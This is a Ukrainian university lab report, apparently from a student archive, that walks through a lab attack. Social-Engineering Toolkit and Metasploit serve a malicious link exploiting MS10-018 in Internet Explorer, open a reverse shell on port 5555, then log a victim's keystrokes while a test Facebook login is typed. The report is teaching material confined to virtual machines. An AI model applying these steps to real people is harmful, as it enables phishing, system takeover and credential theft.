Соціал-інжиніринг Toolkit. Створення шкідливих Weblink для сніфінгу натиснення клавіш жертви

Інформація про навчальний заклад

ВУЗ:
Національний університет Львівська політехніка
Інститут:
ІКТА
Факультет:
ЗІ
Кафедра:
Кафедра захисту інформації

Інформація про роботу

Рік:
2014
Тип роботи:
Лабораторна робота
Предмет:
Методи та засоби захисту інформації
Варіант:
5

Частина тексту файла (без зображень, графіків і формул):

МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ ”ЛЬВІВСЬКА ПОЛІТЕХНІКА” ІКТА кафедра захисту інформації  ЗВІТ до лабораторної роботи № 4 з курсу «Методи та засоби захисту інформації в комп'ютерних мережах» на тему «Соціал-інжиніринг Toolkit. Створення шкідливих Weblink для сніфінгу натиснення клавіш жертви» Львів – 2014 МЕТА РОБОТИ: Створення шкідливого веб-посилання для сніфінгу натиснення клавіш жертви за допомогою інструментарію Social-Engineering Toolkit. КОРОТКІ ТЕОРЕТИЧНІ ВІДОМОСТІ: Що таке Social-Engineering Toolkit (SET) Social-Engineering Toolkit (SET) - це набір користувальницьких інструментів, які виключно зосереджені на атакуючий людський фактор тестування на проникнення. Основною метою є збільшення і моделювання соціально-інженерної атаки і дозволити тестеру ефективно перевірити, як цільові атаки можуть домогтися успіху. Social-Engineering toolkit доступна на Backtrack, як на Backtrack 5, Backbox, Blackbuntu, Gnacktrack і іншими збірками, які використовуються для тестування на проникнення. Примітка до соціальної інженерії Зображення зловмисник вкладення шкідливому посиланню (див. розділ 4, Крок 9) в електронній пошті можливі жертви. Жертва не перевіряє посилання, перш ніж він натискає на неї, щоб помітити, що посилання IP-адреси замість доменних імен. Крім того, IP-адрес, слухає інший порт. (http://192.168.1.105:8080) Даний вид атаки особливо небезпечний, тому що він виходить з ладу веб-браузер жертви, і жертви не розуміють, що далі відбувається: Metasploit корисного навантаження вводить їх в системи Сесії Metasploit прикріплена до своєї системи Прикладена сесія була перенесена з iexplorer.exe до notpad.exe. Правове застереження Ви не будете використовувати ці навики для будь-яких цілей, які є незаконними або заборонені. Вас попереджають, що використання програми за межами вашого тестового середовища вважається шкідливим і є порушенням закону. ХІД РОБОТИ: 1. НАЛАШТУВАННЯ BACKTRACK ПАРАМЕТРІВ ВІРТУАЛЬНОЇ МАШИНИ Відкрийте ваш VMware Player Інструкція: 1. На вашому комп’ютері перейдіть до Start --> All Program --> VMWare --> VMWare Player 2. Редагувати BackTrack параметри віртуальної машини Інструкція: 1. Highlight BackTrack5R1 2. Натисніть “Edit virtual machine settings” 3. Налаштуйте мережевий адаптер Інструкція: 1. Highlight Network Adapter 2. Виберіть Bridged 3. Не натискайте кнопку OK . 2. ВХІД ДО BACKTRACK 1. Запустити BackTrack VM Instance Інструкція: Почати VMWare Player Вибрати BackTrack5R1 Play virtual machine 2. Вхід до BackTrack Інструкція: Login: root Password: toor або <той, на який ви змінили>. 3. Викликати GNOME Інструкція: Тип startx 3. ВІДКРИВАННЯ КОНСОЛІ ТЕРМІНАЛУ ТА ОТРИМАННЯ IP-АДРЕСИ 1. Відкрийте консоль терміналу Інструкція: Натиснути на консоль терміналу 2. Отримати IP Address Інструкція: ifconfig -a Примітка: Як зазначено нижче, мій IP адрес 192.168.1.105. Будь ласка, запишіть свій IP адрес. 4. ПОЧАТОК РОБОТИ SOCIAL ENGINEERING TOOLKIT 1. Почати Social Engineering ToolKit Інструкція: 1. cd /pentest/exploits/set 2. ./set Веб-сайт атака Інструкція: Вибрати 2 3. Вибрати метод Metasploit Browser Exploit Інструкція: Вибрати 2 4. Вибрати Веб-шаблони Інструкція: Вибрати 1 5. Встановіть веб-атаки Інструкція: Вибрати 3 6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018) Інструкція: Вибрати 15 7. Windows Shell Reverse_TCP Інструкція: 1. Select 1 8. Установка зворотнього порту Інструкція: 1. Установити на 5555 9. Почекайте запуску сервера Інструкція: Скопіюйте веб-посилання, вказану вище сервер почав лінію. Переходьте до наступного розділу. Примітка: Це шкідливе веб-посилання, яке буде використовуватися зловмисником для соціальної інженерії, їхній шлях до машини жертви. 5. ЗАПУСК МАШИНИ WINDOWS Примітка до соціальної інженерії Уявіть, як атакуючий може впровадити зловмисне посилання, зазначене в розділі 4, крок 9 в електронній пошті до можливих жертв. Даний вид атаки особливо небезпечний, тому що він виводить з ладу веб-браузер жертви, і жертви не розуміють Metasploit корисного навантаження був введений і сесії тепер прикріплені до процесу міграції блокнот. 1. Завантаження до WindowsVulerable01 Інструкція: Запустіть VMware Player Виберіть WindowsVulerable01 Налаштуйте Virtual Machine 2. Налаштування Network Adapter Інструкція: Виберіть Network Adapter Виберіть Bridged Connection Натисніть OK 3.Запустіть WindowVulnerable01 Інструкція: 1. Виберіть Play virtual Machine 4. Аутентифікація WindowsVulerable01 Інструкція: 1. Увійдіть як адміністратор 6. Запустіть Web Browser 1. Запустіть Internet Explorer Інструкція: Start --> All Programs --> Internet Explorer 2. Жертва натискає на посилання Інструкція: Встановіть IP BackTrack в адресному рядку. В нашому випадку, http://192.168.1.105:8080/ У вашому випадку, візміть IP адрес з Розділу 5, Крок 9. Веб-браузер буде просто зломаний. 7. АНАЛІЗ РЕЗУЛЬТАТІВ ПІСЛЯ ВЗЛОМУ БРАУЗЕРА 1. Запустити командну строку Інструкція: All Programs --> Accessories --> Command Prompt 2. Запустити командну строку Інструкція: netstat -nao | findstr 5555 tasklist | findstr 2976 2976 - процес ID для сесії Metasploit, йде на порту 5555. У вашому випадку, процес ID ймовірно буде відмінний. 3. tasklist | findstr notepad Завдання лабораторної: 1. date 2. echo "Your Name" 1. Where the string "Your Name" is your actual name. 2. e.g., echo "John Gray" 3. Зробіть PrtScn 4. Вставити у документ Word  8. УВІЙДІТЬ НА ЗЛОМАНУ МАШИНУ 1. Отримайте негайно MSF Інструкція: Натисніть <Enter>, коли побачите notepad.exe line. 2. Отримайте командний рядок жертви Інструкція: sessions sessions -i 1 execute -f cmd.exe -i –M 3. Запустіть удар по системі натисненням клавіші Інструкція: 1. Натисніть <Ctrl> and "z" key at the same time. Це помістить сесію 1 у попередній фон. 2. y 3. keyscan_start 4. Перейдіть до наступної секції. 9. ВХІД У FACEBOOK 1. Запустіть Internet Explorer Інструкція: Start --> All Programs --> Internet Explorer 2. Вхід у Facebook Інструкція: 1. Email: Використовуйте підроблену адресу first.last@victim.com, де спочатку - ваше ім'я і в кінці - ваше прізвище. e.g., john.gray@victim.com Password: Який ви хочете. 10. ПОДИВІТЬСЯ НА КЛАВІШУ ВЗЛОМУ 1. Вийдіть з меню мережевого нападу Інструкція: 1. keyscan_dump This will proceduce the Facebook 2. keyscan_stop Завдання лабораторної #2: Зробіть PrtScan Вставте в той самий документ, що і в завданні#1. 11. ЗАВДАННЯ ДО ЛАБОРАТОРНОЇ 1. Завдання до лабораторної Інструкція: Інструкція до завдання #1 (Дивитись Розділ 7, Крок 2) Інструкція до завдання #2 (Дивитись Розділ 10, Крок 1)  ВИСНОВОК: Здійснив створення шкідливого веб-посилання для сніфінгу натиснення клавіш жертви за допомогою інструментарію Social-Engineering Toolkit. Social-Engineering Toolkit (SET) - це набір користувальницьких інструментів, які виключно зосереджені на атакуючий людський фактор тестування на проникнення. Основною метою є моделювання соціально-інженерної атаки і дозволити тестеру ефективно перевірити, як цільові атаки можуть домогтися успіху. Даний вид атаки особливо небезпечний, тому що він виходить з ладу веб-браузер жертви, і жертви не розуміють, що далі відбувається: Metasploit корисного навантаження вводить їх в систему Сесії Metasploit прикріплена до своєї системи Прикладена сесія була перенесена з iexplorer.exe до notpad.exe.
Антиботан аватар за замовчуванням

25.05.2014 09:05-

Коментарі

Ви не можете залишити коментар. Для цього, будь ласка, увійдіть або зареєструйтесь.

Ділись своїми роботами та отримуй миттєві бонуси!

Маєш корисні навчальні матеріали, які припадають пилом на твоєму комп'ютері? Розрахункові, лабораторні, практичні чи контрольні роботи — завантажуй їх прямо зараз і одразу отримуй бали на свій рахунок! Заархівуй всі файли в один .zip (до 100 МБ) або завантажуй кожен файл окремо. Внесок у спільноту – це легкий спосіб допомогти іншим та отримати додаткові можливості на сайті. Твої старі роботи можуть приносити тобі нові нагороди!
Нічого не вибрано
0%

Оголошення від адміністратора

Антиботан аватар за замовчуванням

Подякувати Студентському архіву довільною сумою

Admin

26.02.2023 12:38

Дякуємо, що користуєтесь нашим архівом!